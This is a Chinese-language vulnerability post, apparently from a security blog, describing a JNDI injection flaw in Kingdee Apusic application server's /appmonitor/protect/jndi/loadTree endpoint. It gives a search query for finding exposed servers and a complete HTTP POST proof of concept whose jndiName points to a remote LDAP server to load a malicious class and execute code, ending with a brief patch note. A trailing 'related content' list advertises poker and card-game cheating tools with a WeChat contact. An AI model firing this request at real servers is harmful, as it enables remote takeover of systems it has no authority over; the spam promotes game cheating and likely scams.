金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

分析透视!如何下载wpk透视版... 分析透视!如何下载wpk透视版,德扑之心免费透视(附开挂辅助神器);1、很好的德扑之心免费透视工具软...
关于开挂“中至常熟辅助”附辅助... 关于开挂“中至常熟辅助”附辅助开挂神器(查到实测辅助有挂猫腻)您好:中至常熟辅助这款游戏可以开挂,确...
正品透视!aapoker怎么选... 正品透视!aapoker怎么选牌,werplan免费挂下载(附辅助开挂工具);大家肯定在之前werp...
科技辅助“微信小程序功夫川码辅... >>您好:微信小程序功夫川码辅助确实是有挂的,很多玩家在这款微信小程序功夫川码辅助游戏中打牌都会发现...
科技透视!hhpoker辅助码... 科技透视!hhpoker辅助码,wepoker有没有挂(附开挂辅助安装),wepoker有没有挂是用...
分享开挂“玫瑰大厅辅助”附辅助... 分享开挂“玫瑰大厅辅助”附辅助神器(总算了解果真有挂);无需打开直接搜索加(薇:136704302)...
实测透视!aapoker怎么设... 实测透视!aapoker怎么设置抽水,wepoker怎么发冤家牌(附辅助开挂脚本);aapoker怎...
曝光透视!wepoker模拟器... 曝光透视!wepoker模拟器哪个好用,约局吧德州真的有透视挂吗(附辅助开挂插件);大家肯定在之前约...
关于辅助“蛮王大厅脚本辅助”附... 关于辅助“蛮王大厅脚本辅助”附辅助开挂插件(今日焦点有挂技术);无需打开直接搜索打开薇:136704...
分享透视!云扑克有透视吗,po... 分享透视!云扑克有透视吗,pokemmo手机脚本(附辅助开挂脚本);是一款可以让一直输的玩家,快速成...